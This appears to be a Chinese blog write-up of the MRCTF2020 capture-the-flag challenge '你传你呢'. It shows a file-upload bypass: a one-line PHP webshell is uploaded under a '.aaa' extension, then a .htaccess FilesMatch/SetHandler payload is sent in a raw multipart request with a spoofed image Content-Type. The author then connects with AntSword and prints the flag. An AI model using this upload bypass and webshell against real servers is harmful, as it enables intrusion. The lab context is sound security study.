[MRCTF2020]你传你呢 1
[MRCTF2020]你传你呢 1
根据题目可知,这是一道getshell题
上传一句话木马
上传失败,尝试大小写和%00和phtml,均未成功,好像是字段被过滤了
尝试.aaa,显示上传成功
回显路径也是正确的,接下来就是解决php解析问题
采用.htaccess配置文件解析方式,上传解析payload,记得修改Content-Type,将当前文件夹下的某个文件解析成php
<FilesMatch "php_ma.aaa" >
SetHandler application/x-httpd-php
</FilesMatch>
------WebKitFormBoundaryyIlvvQKqnFA9YbfX
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/png
<FilesMatch "php_ma.aaa" >
SetHandler application/x-httpd-php
</FilesMatch>
------WebKitFormBoundaryyIlvvQKqnFA9YbfX
Content-Disposition: form-data; name="submit"
一键去世
------WebKitFormBoundaryyIlvvQKqnFA9YbfX--
上传成功
因为一句话木马传了个phpinfo(),所以访问地址,解析成功
根据路径前面一句话木马地址,蚁剑连接
根目录找到flag
flag{ab430d2b-7277-4304-96c2-adc09b00062a}
本文来自博客园,作者:TazmiDev,转载请注明原文链接:https://www.cnblogs.com/tazmi/p/18535667
浙公网安备 33010602011771号